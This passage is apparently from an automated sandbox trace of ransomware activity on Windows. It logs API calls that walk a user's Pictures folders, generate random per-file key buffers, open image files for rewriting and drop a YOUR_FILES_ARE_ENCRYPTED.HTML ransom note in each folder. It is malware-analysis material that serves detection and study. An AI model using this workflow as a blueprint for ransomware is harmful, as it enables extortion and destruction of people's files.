(in: param_1=0x19e9fe, param_2="%02X" | out: param_1="25") returned 2 [0125.217] wsprintfW (in: param_1=0x19ea02, param_2="%02X" | out: param_1="FD") returned 2 [0125.217] wsprintfW (in: param_1=0x19ea06, param_2="%02X" | out: param_1="2D") returned 2 [0125.217] wsprintfW (in: param_1=0x19ea0a, param_2="%02X" | out: param_1="2E") returned 2 [0125.217] wsprintfW (in: param_1=0x19ea0e, param_2="%02X" | out: param_1="CE") returned 2 [0125.217] wsprintfW (in: param_1=0x19ea12, param_2="%02X" | out: param_1="81") returned 2 [0125.217] wsprintfW (in: param_1=0x19ea16, param_2="%02X" | out: param_1="03") returned 2 [0125.232] wsprintfW (in: param_1=0x19ea1a, param_2="%02X" | out: param_1="9F") returned 2 [0125.232] wsprintfW (in: param_1=0x19ea1e, param_2="%02X" | out: param_1="5B") returned 2 [0125.232] wsprintfW (in: param_1=0x19ea22, param_2="%02X" | out: param_1="0A") returned 2 [0125.232] wsprintfW (in: param_1=0x19ea26, param_2="%02X" | out: param_1="01") returned 2 [0125.232] wsprintfW (in: param_1=0x19ea2a, param_2="%02X" | out: param_1="AC") returned 2 [0125.232] wsprintfW (in: param_1=0x19ea2e, param_2="%02X" | out: param_1="59") returned 2 [0125.232] wsprintfW (in: param_1=0x19ea32, param_2="%02X" | out: param_1="08") returned 2 [0125.232] wsprintfW (in: param_1=0x19ea36, param_2="%02X" | out: param_1="D7") returned 2 [0125.232] wsprintfW (in: param_1=0x19ea3a, param_2="%02X" | out: param_1="66") returned 2 [0125.232] wsprintfW (in: param_1=0x19ea3e, param_2="%02X" | out: param_1="AB") returned 2 [0125.232] wsprintfW (in: param_1=0x19ea42, param_2="%02X" | out: param_1="A2") returned 2 [0125.232] wsprintfW (in: param_1=0x19ea46, param_2="%02X" | out: param_1="C2") returned 2 [0125.232] wsprintfW (in: param_1=0x19ea4a, param_2="%02X" | out: param_1="F7") returned 2 [0125.232] wsprintfW (in: param_1=0x19ea4e, param_2="%02X" | out: param_1="E8") returned 2 [0125.232] wsprintfW (in: param_1=0x19ea52, param_2="%02X" | out: param_1="C7") returned 2 [0125.232] wsprintfW (in: param_1=0x19ea56, param_2="%02X" | out: param_1="E9") returned 2 [0125.232] wsprintfW (in: param_1=0x19ea5a, param_2="%02X" | out: param_1="DC") returned 2 [0125.232] wsprintfW (in: param_1=0x19ea5e, param_2="%02X" | out: param_1="69") returned 2 [0125.232] wsprintfW (in: param_1=0x19ea62, param_2="%02X" | out: param_1="6B") returned 2 [0125.233] lstrcpyW (in: lpString1=0x33500bc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\C9WQy_h\\Prz_nhOiA.jpg" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\C9WQy_h\\Prz_nhOiA.jpg") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\C9WQy_h\\Prz_nhOiA.jpg" [0125.233] CreateIoCompletionPort (FileHandle=0x31c, ExistingCompletionPort=0x274, CompletionKey=0x3340008, NumberOfConcurrentThreads=0x0) returned 0x274 [0125.233] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x3340008, lpOverlapped=0x3340008) returned 1 [0125.238] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8317f060, ftCreationTime.dwHighDateTime=0x1d708a1, ftLastAccessTime.dwLowDateTime=0x5d3cc8d0, ftLastAccessTime.dwHighDateTime=0x1d7094f, ftLastWriteTime.dwLowDateTime=0x5d3cc8d0, ftLastWriteTime.dwHighDateTime=0x1d7094f, nFileSizeHigh=0x0, nFileSizeLow=0xb32f, dwReserved0=0x19ec60, dwReserved1=0xfe73738c, cFileName="Rl-Y9JJsJpxwEMRm.png", cAlternateFileName="RL-Y9J~1.PNG")) returned 1 [0125.239] StrStrIW (lpFirst="Rl-Y9JJsJpxwEMRm.png", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0125.239] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\C9WQy_h\\Rl-Y9JJsJpxwEMRm.png") returned 63 [0125.239] PathFindExtensionW (pszPath="Rl-Y9JJsJpxwEMRm.png") returned=".png" [0125.239] lstrlenW (lpString=".png") returned 4 [0125.239] PathFindExtensionW (pszPath="Rl-Y9JJsJpxwEMRm.png") returned=".png" [0125.239] SystemFunction036 (in: RandomBuffer=0x19eaa8, RandomBufferLength=0x20 | out: RandomBuffer=0x19eaa8) returned 1 [0125.239] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\C9WQy_h\\Rl-Y9JJsJpxwEMRm.png" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\c9wqy_h\\rl-y9jjsjpxwemrm.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x31c [0125.240] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0x19eacc | out: lpFileSize=0x19eacc*=45871) returned 1 [0125.240] GetProcessHeap () returned 0x600000 [0125.240] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x3340008 [0125.240] wsprintfW (in: param_1=0x19e9e6, param_2="%02X" | out: param_1="E1") returned 2 [0125.240] wsprintfW (in: param_1=0x19e9ea, param_2="%02X" | out: param_1="00") returned 2 [0125.240] wsprintfW (in: param_1=0x19e9ee, param_2="%02X" | out: param_1="95") returned 2 [0125.240] wsprintfW (in: param_1=0x19e9f2, param_2="%02X" | out: param_1="DC") returned 2 [0125.241] wsprintfW (in: param_1=0x19e9f6, param_2="%02X" | out: param_1="E8") returned 2 [0125.241] wsprintfW (in: param_1=0x19e9fa, param_2="%02X" | out: param_1="3F") returned 2 [0125.241] wsprintfW (in: param_1=0x19e9fe, param_2="%02X" | out: param_1="82") returned 2 [0125.241] wsprintfW (in: param_1=0x19ea02, param_2="%02X" | out: param_1="1A") returned 2 [0125.241] wsprintfW (in: param_1=0x19ea06, param_2="%02X" | out: param_1="DD") returned 2 [0125.241] wsprintfW (in: param_1=0x19ea0a, param_2="%02X" | out: param_1="3F") returned 2 [0125.241] wsprintfW (in: param_1=0x19ea0e, param_2="%02X" | out: param_1="C4") returned 2 [0125.241] wsprintfW (in: param_1=0x19ea12, param_2="%02X" | out: param_1="51") returned 2 [0125.241] wsprintfW (in: param_1=0x19ea16, param_2="%02X" | out: param_1="45") returned 2 [0125.241] wsprintfW (in: param_1=0x19ea1a, param_2="%02X" | out: param_1="83") returned 2 [0125.241] wsprintfW (in: param_1=0x19ea1e, param_2="%02X" | out: param_1="AA") returned 2 [0125.241] wsprintfW (in: param_1=0x19ea22, param_2="%02X" | out: param_1="BC") returned 2 [0125.241] wsprintfW (in: param_1=0x19ea26, param_2="%02X" | out: param_1="B9") returned 2 [0125.241] wsprintfW (in: param_1=0x19ea2a, param_2="%02X" | out: param_1="C3") returned 2 [0125.241] wsprintfW (in: param_1=0x19ea2e, param_2="%02X" | out: param_1="82") returned 2 [0125.241] wsprintfW (in: param_1=0x19ea32, param_2="%02X" | out: param_1="84") returned 2 [0125.241] wsprintfW (in: param_1=0x19ea36, param_2="%02X" | out: param_1="D4") returned 2 [0125.241] wsprintfW (in: param_1=0x19ea3a, param_2="%02X" | out: param_1="47") returned 2 [0125.241] wsprintfW (in: param_1=0x19ea3e, param_2="%02X" | out: param_1="FB") returned 2 [0125.241] wsprintfW (in: param_1=0x19ea42, param_2="%02X" | out: param_1="13") returned 2 [0125.241] wsprintfW (in: param_1=0x19ea46, param_2="%02X" | out: param_1="39") returned 2 [0125.241] wsprintfW (in: param_1=0x19ea4a, param_2="%02X" | out: param_1="FE") returned 2 [0125.241] wsprintfW (in: param_1=0x19ea4e, param_2="%02X" | out: param_1="E1") returned 2 [0125.241] wsprintfW (in: param_1=0x19ea52, param_2="%02X" | out: param_1="E2") returned 2 [0125.241] wsprintfW (in: param_1=0x19ea56, param_2="%02X" | out: param_1="11") returned 2 [0125.241] wsprintfW (in: param_1=0x19ea5a, param_2="%02X" | out: param_1="35") returned 2 [0125.241] wsprintfW (in: param_1=0x19ea5e, param_2="%02X" | out: param_1="49") returned 2 [0125.241] wsprintfW (in: param_1=0x19ea62, param_2="%02X" | out: param_1="4A") returned 2 [0125.242] lstrcpyW (in: lpString1=0x33500bc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\C9WQy_h\\Rl-Y9JJsJpxwEMRm.png" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\C9WQy_h\\Rl-Y9JJsJpxwEMRm.png") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\C9WQy_h\\Rl-Y9JJsJpxwEMRm.png" [0125.242] CreateIoCompletionPort (FileHandle=0x31c, ExistingCompletionPort=0x274, CompletionKey=0x3340008, NumberOfConcurrentThreads=0x0) returned 0x274 [0125.242] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x3340008, lpOverlapped=0x3340008) returned 1 [0125.243] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8317f060, ftCreationTime.dwHighDateTime=0x1d708a1, ftLastAccessTime.dwLowDateTime=0x5d3cc8d0, ftLastAccessTime.dwHighDateTime=0x1d7094f, ftLastWriteTime.dwLowDateTime=0x5d3cc8d0, ftLastWriteTime.dwHighDateTime=0x1d7094f, nFileSizeHigh=0x0, nFileSizeLow=0xb32f, dwReserved0=0x19ec60, dwReserved1=0xfe73738c, cFileName="Rl-Y9JJsJpxwEMRm.png", cAlternateFileName="RL-Y9J~1.PNG")) returned 0 [0125.247] FindClose (in: hFindFile=0x6265f8 | out: hFindFile=0x6265f8) returned 1 [0125.247] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\C9WQy_h\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 72 [0125.247] GetProcessHeap () returned 0x600000 [0125.247] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3155038 [0125.248] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\C9WQy_h\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\c9wqy_h\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0125.248] WriteFile (in: hFile=0x328, lpBuffer=0x3155038*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19edcc, lpOverlapped=0x0 | out: lpBuffer=0x3155038*, lpNumberOfBytesWritten=0x19edcc*=0x3c00, lpOverlapped=0x0) returned 1 [0125.250] CloseHandle (hObject=0x328) returned 1 [0125.250] GetProcessHeap () returned 0x600000 [0125.250] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3155038 | out: hHeap=0x600000) returned 1 [0125.250] GetProcessHeap () returned 0x600000 [0125.250] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f4fc8 | out: hHeap=0x600000) returned 1 [0125.254] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2b0e752d, ftCreationTime.dwHighDateTime=0x1d70504, ftLastAccessTime.dwLowDateTime=0x2b10dbc5, ftLastAccessTime.dwHighDateTime=0x1d70504, ftLastWriteTime.dwLowDateTime=0x2b10dbc5, ftLastWriteTime.dwHighDateTime=0x1d70504, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19eee8, dwReserved1=0x7784abfa, cFileName="Camera Roll", cAlternateFileName="CAMERA~1")) returned 1 [0125.254] StrStrIW (lpFirst="Camera Roll", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0125.254] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\Camera Roll") returned 46 [0125.254] GetProcessHeap () returned 0x600000 [0125.254] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f4fc8 [0125.255] lstrcpyW (in: lpString1=0x30f4fc8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\Camera Roll" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\Camera Roll") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\Camera Roll" [0125.255] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\Camera Roll", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\Camera Roll\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\Camera Roll\\*" [0125.255] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\Camera Roll\\*", lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2b0e752d, ftCreationTime.dwHighDateTime=0x1d70504, ftLastAccessTime.dwLowDateTime=0x2b10dbc5, ftLastAccessTime.dwHighDateTime=0x1d70504, ftLastWriteTime.dwLowDateTime=0x2b10dbc5, ftLastWriteTime.dwHighDateTime=0x1d70504, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19ec60, dwReserved1=0xfe73738c, cFileName=".", cAlternateFileName="")) returned 0x6267b8 [0125.255] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2b0e752d, ftCreationTime.dwHighDateTime=0x1d70504, ftLastAccessTime.dwLowDateTime=0x2b10dbc5, ftLastAccessTime.dwHighDateTime=0x1d70504, ftLastWriteTime.dwLowDateTime=0x2b10dbc5, ftLastWriteTime.dwHighDateTime=0x1d70504, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19ec60, dwReserved1=0xfe73738c, cFileName="..", cAlternateFileName="")) returned 1 [0125.255] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x2b10dbc5, ftCreationTime.dwHighDateTime=0x1d70504, ftLastAccessTime.dwLowDateTime=0x2b10dbc5, ftLastAccessTime.dwHighDateTime=0x1d70504, ftLastWriteTime.dwLowDateTime=0x2b10dbc5, ftLastWriteTime.dwHighDateTime=0x1d70504, nFileSizeHigh=0x0, nFileSizeLow=0xbe, dwReserved0=0x19ec60, dwReserved1=0xfe73738c, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0125.255] StrStrIW (lpFirst="desktop.ini", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0125.255] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\Camera Roll\\desktop.ini") returned 58 [0125.255] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0125.255] lstrlenW (lpString=".ini") returned 4 [0125.255] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0125.256] SystemFunction036 (in: RandomBuffer=0x19eaa8, RandomBufferLength=0x20 | out: RandomBuffer=0x19eaa8) returned 1 [0125.256] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\Camera Roll\\desktop.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\camera roll\\desktop.ini"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x31c [0125.256] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0x19eacc | out: lpFileSize=0x19eacc*=190) returned 1 [0125.256] CloseHandle (hObject=0x31c) returned 1 [0125.256] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x2b10dbc5, ftCreationTime.dwHighDateTime=0x1d70504, ftLastAccessTime.dwLowDateTime=0x2b10dbc5, ftLastAccessTime.dwHighDateTime=0x1d70504, ftLastWriteTime.dwLowDateTime=0x2b10dbc5, ftLastWriteTime.dwHighDateTime=0x1d70504, nFileSizeHigh=0x0, nFileSizeLow=0xbe, dwReserved0=0x19ec60, dwReserved1=0xfe73738c, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0125.256] FindClose (in: hFindFile=0x6267b8 | out: hFindFile=0x6267b8) returned 1 [0125.257] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\Camera Roll\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 76 [0125.257] GetProcessHeap () returned 0x600000 [0125.257] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3155038 [0125.257] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\Camera Roll\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\camera roll\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0125.258] WriteFile (in: hFile=0x328, lpBuffer=0x3155038*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19edcc, lpOverlapped=0x0 | out: lpBuffer=0x3155038*, lpNumberOfBytesWritten=0x19edcc*=0x3c00, lpOverlapped=0x0) returned 1 [0125.259] CloseHandle (hObject=0x328) returned 1 [0125.259] GetProcessHeap () returned 0x600000 [0125.259] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3155038 | out: hHeap=0x600000) returned 1 [0125.259] GetProcessHeap () returned 0x600000 [0125.259] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f4fc8 | out: hHeap=0x600000) returned 1 [0125.259] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x435fd682, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x435fd682, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x436238c4, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0x19eee8, dwReserved1=0x7784abfa, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0125.259] StrStrIW (lpFirst="desktop.ini", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0125.259] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\desktop.ini") returned 46 [0125.260] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0125.260] lstrlenW (lpString=".ini") returned 4 [0125.260] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0125.260] SystemFunction036 (in: RandomBuffer=0x19edbc, RandomBufferLength=0x20 | out: RandomBuffer=0x19edbc) returned 1 [0125.260] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\desktop.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\desktop.ini"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x328 [0125.260] GetFileSizeEx (in: hFile=0x328, lpFileSize=0x19ede0 | out: lpFileSize=0x19ede0*=504) returned 1 [0125.260] CloseHandle (hObject=0x328) returned 1 [0125.260] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x212016b0, ftCreationTime.dwHighDateTime=0x1d70925, ftLastAccessTime.dwLowDateTime=0xeb7eda90, ftLastAccessTime.dwHighDateTime=0x1d7094d, ftLastWriteTime.dwLowDateTime=0xeb7eda90, ftLastWriteTime.dwHighDateTime=0x1d7094d, nFileSizeHigh=0x0, nFileSizeLow=0xb223, dwReserved0=0x19eee8, dwReserved1=0x7784abfa, cFileName="f4nhXOZ2JJMu.gif", cAlternateFileName="F4NHXO~1.GIF")) returned 1 [0125.260] StrStrIW (lpFirst="f4nhXOZ2JJMu.gif", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0125.260] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\f4nhXOZ2JJMu.gif") returned 51 [0125.260] PathFindExtensionW (pszPath="f4nhXOZ2JJMu.gif") returned=".gif" [0125.260] lstrlenW (lpString=".gif") returned 4 [0125.261] PathFindExtensionW (pszPath="f4nhXOZ2JJMu.gif") returned=".gif" [0125.261] SystemFunction036 (in: RandomBuffer=0x19edbc, RandomBufferLength=0x20 | out: RandomBuffer=0x19edbc) returned 1 [0125.261] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\f4nhXOZ2JJMu.gif" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\f4nhxoz2jjmu.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x328 [0125.261] GetFileSizeEx (in: hFile=0x328, lpFileSize=0x19ede0 | out: lpFileSize=0x19ede0*=45603) returned 1 [0125.261] GetProcessHeap () returned 0x600000 [0125.261] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x3340008 [0125.263] wsprintfW (in: param_1=0x19ecfa, param_2="%02X" | out: param_1="19") returned 2 [0125.263] wsprintfW (in: param_1=0x19ecfe, param_2="%02X" | out: param_1="BD") returned 2 [0125.263] wsprintfW (in: param_1=0x19ed02, param_2="%02X" | out: param_1="52") returned 2 [0125.263] wsprintfW (in: param_1=0x19ed06, param_2="%02X" | out: param_1="1E") returned 2 [0125.264] wsprintfW (in: param_1=0x19ed0a, param_2="%02X" | out: param_1="A1") returned 2 [0125.264] wsprintfW (in: param_1=0x19ed0e, param_2="%02X" | out: param_1="8D") returned 2 [0125.264] wsprintfW (in: param_1=0x19ed12, param_2="%02X" | out: param_1="41") returned 2 [0125.264] wsprintfW (in: param_1=0x19ed16, param_2="%02X" | out: param_1="C6") returned 2 [0125.264] wsprintfW (in: param_1=0x19ed1a, param_2="%02X" | out: param_1="11") returned 2 [0125.264] wsprintfW (in: param_1=0x19ed1e, param_2="%02X" | out: param_1="45") returned 2 [0125.264] wsprintfW (in: param_1=0x19ed22, param_2="%02X" | out: param_1="3B") returned 2 [0125.264] wsprintfW (in: param_1=0x19ed26, param_2="%02X" | out: param_1="E4") returned 2 [0125.264] wsprintfW (in: param_1=0x19ed2a, param_2="%02X" | out: param_1="CF") returned 2 [0125.264] wsprintfW (in: param_1=0x19ed2e, param_2="%02X" | out: param_1="CE") returned 2 [0125.264] wsprintfW (in: param_1=0x19ed32, param_2="%02X" | out: param_1="23") returned 2 [0125.264] wsprintfW (in: param_1=0x19ed36, param_2="%02X" | out: param_1="5B") returned 2 [0125.264] wsprintfW (in: param_1=0x19ed3a, param_2="%02X" | out: param_1="9F") returned 2 [0125.264] wsprintfW (in: param_1=0x19ed3e, param_2="%02X" | out: param_1="6A") returned 2 [0125.264] wsprintfW (in: param_1=0x19ed42, param_2="%02X" | out: param_1="4F") returned 2 [0125.264] wsprintfW (in: param_1=0x19ed46, param_2="%02X" | out: param_1="2C") returned 2 [0125.264] wsprintfW (in: param_1=0x19ed4a, param_2="%02X" | out: param_1="20") returned 2 [0125.264] wsprintfW (in: param_1=0x19ed4e, param_2="%02X" | out: param_1="B9") returned 2 [0125.264] wsprintfW (in: param_1=0x19ed52, param_2="%02X" | out: param_1="12") returned 2 [0125.264] wsprintfW (in: param_1=0x19ed56, param_2="%02X" | out: param_1="EE") returned 2 [0125.264] wsprintfW (in: param_1=0x19ed5a, param_2="%02X" | out: param_1="54") returned 2 [0125.264] wsprintfW (in: param_1=0x19ed5e, param_2="%02X" | out: param_1="13") returned 2 [0125.264] wsprintfW (in: param_1=0x19ed62, param_2="%02X" | out: param_1="11") returned 2 [0125.264] wsprintfW (in: param_1=0x19ed66, param_2="%02X" | out: param_1="5F") returned 2 [0125.264] wsprintfW (in: param_1=0x19ed6a, param_2="%02X" | out: param_1="21") returned 2 [0125.264] wsprintfW (in: param_1=0x19ed6e, param_2="%02X" | out: param_1="CD") returned 2 [0125.264] wsprintfW (in: param_1=0x19ed72, param_2="%02X" | out: param_1="0E") returned 2 [0125.264] wsprintfW (in: param_1=0x19ed76, param_2="%02X" | out: param_1="0F") returned 2 [0125.265] lstrcpyW (in: lpString1=0x33500bc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\f4nhXOZ2JJMu.gif" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\f4nhXOZ2JJMu.gif") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\f4nhXOZ2JJMu.gif" [0125.265] CreateIoCompletionPort (FileHandle=0x328, ExistingCompletionPort=0x274, CompletionKey=0x3340008, NumberOfConcurrentThreads=0x0) returned 0x274 [0125.265] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x3340008, lpOverlapped=0x3340008) returned 1 [0125.267] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe35804d0, ftCreationTime.dwHighDateTime=0x1d70755, ftLastAccessTime.dwLowDateTime=0x631b6e10, ftLastAccessTime.dwHighDateTime=0x1d707eb, ftLastWriteTime.dwLowDateTime=0x631b6e10, ftLastWriteTime.dwHighDateTime=0x1d707eb, nFileSizeHigh=0x0, nFileSizeLow=0xc6c2, dwReserved0=0x19eee8, dwReserved1=0x7784abfa, cFileName="fmAjYu WdJfo pyd48R.png", cAlternateFileName="FMAJYU~1.PNG")) returned 1 [0125.267] StrStrIW (lpFirst="fmAjYu WdJfo pyd48R.png", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0125.267] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\fmAjYu WdJfo pyd48R.png") returned 58 [0125.267] PathFindExtensionW (pszPath="fmAjYu WdJfo pyd48R.png") returned=".png" [0125.267] lstrlenW (lpString=".png") returned 4 [0125.267] PathFindExtensionW (pszPath="fmAjYu WdJfo pyd48R.png") returned=".png" [0125.267] SystemFunction036 (in: RandomBuffer=0x19edbc, RandomBufferLength=0x20 | out: RandomBuffer=0x19edbc) returned 1 [0125.267] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\fmAjYu WdJfo pyd48R.png" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\fmajyu wdjfo pyd48r.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x31c [0125.270] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0x19ede0 | out: lpFileSize=0x19ede0*=50882) returned 1 [0125.270] GetProcessHeap () returned 0x600000 [0125.270] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x3340008 [0125.271] wsprintfW (in: param_1=0x19ecfa, param_2="%02X" | out: param_1="88") returned 2 [0125.271] wsprintfW (in: param_1=0x19ecfe, param_2="%02X" | out: param_1="F2") returned 2 [0125.271] wsprintfW (in: param_1=0x19ed02, param_2="%02X" | out: param_1="9E") returned 2 [0125.271] wsprintfW (in: param_1=0x19ed06, param_2="%02X" | out: param_1="9D") returned 2 [0125.271] wsprintfW (in: param_1=0x19ed0a, param_2="%02X" | out: param_1="87") returned 2 [0125.271] wsprintfW (in: 